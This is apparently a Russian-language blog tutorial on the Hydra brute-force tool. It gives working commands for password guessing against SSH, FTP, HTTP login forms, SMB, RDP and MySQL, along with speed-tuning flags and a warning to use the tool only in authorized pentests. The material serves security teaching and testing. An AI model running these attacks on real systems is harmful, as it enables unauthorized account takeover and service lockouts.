Hydra — один из самых известных инструментов для атак на аутентификацию сетевых сервисов. SSH, FTP, HTTP Basic Auth, RDP, SMB, MySQL, PostgreSQL, Telnet — Hydra поддерживает более 50 протоколов. При этом атака проводится параллельно, что даёт серьёзную скорость перебора.
Синтаксис и базовые примеры
Общий синтаксис:
hydra [опции] ЦЕЛЬ ПРОТОКОЛ [параметры]
Брутфорс SSH с одним пользователем и словарём паролей:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
Если нужно перебирать и логины тоже:
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
Одна пара логин:пароль (быстрая проверка):
hydra -l admin -p admin123 ssh://192.168.1.100
Атака на HTTP-форму
Это самый часто используемый и самый трудоёмкий в настройке сценарий. Нужно понять форму: метод (POST/GET), имена полей, признак неудачи.
hydra -l admin -P wordlist.txt 192.168.1.100 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
Здесь:
- /login — путь к форме
- username=^USER^&password=^PASS^ — тело POST, ^USER^ и ^PASS^ — плейсхолдеры
- Invalid credentials — строка в ответе при неудаче (Hydra ищет её)
Популярные протоколы
FTP:
hydra -l ftp_user -P wordlist.txt ftp://192.168.1.100
SMB:
hydra -l administrator -P wordlist.txt smb://192.168.1.100
RDP:
hydra -l administrator -P wordlist.txt rdp://192.168.1.100
MySQL:
hydra -l root -P wordlist.txt mysql://192.168.1.100
Управление скоростью
-t — количество параллельных потоков (по умолчанию 16):
hydra -l admin -P wordlist.txt -t 32 ssh://192.168.1.100
-w — время ожидания ответа в секундах:
hydra -l admin -P wordlist.txt -t 4 -w 30 rdp://192.168.1.100
RDP и SMB чувствительны к количеству потоков — используйте -t 1..4 для стабильности.
Полезные опции
- -V — verbose режим, показывать каждую попытку
- -f — остановиться после первого найденного пароля
- -o result.txt — сохранить успешные пары в файл
- -e nsr — дополнительные попытки: n=нет пароля, s=логин как пароль, r=обратный логин
- -s PORT — нестандартный порт
Пример с несколькими опциями:
hydra -l admin -P rockyou.txt -t 8 -f -V -o found.txt ssh://192.168.1.100
Восстановление после прерывания
Если атака прервалась — Hydra автоматически создаёт файл восстановления. Продолжить:
hydra -R
Важное замечание
Hydra — мощный инструмент, который генерирует много шума в логах. На реальных пентестах согласовывайте атаки на аутентификацию с заказчиком отдельно — блокировка аккаунтов и алерты SOC могут повлиять на ход проекта. Используйте только в авторизованных тестах.
Пока нет комментариев. Будьте первым!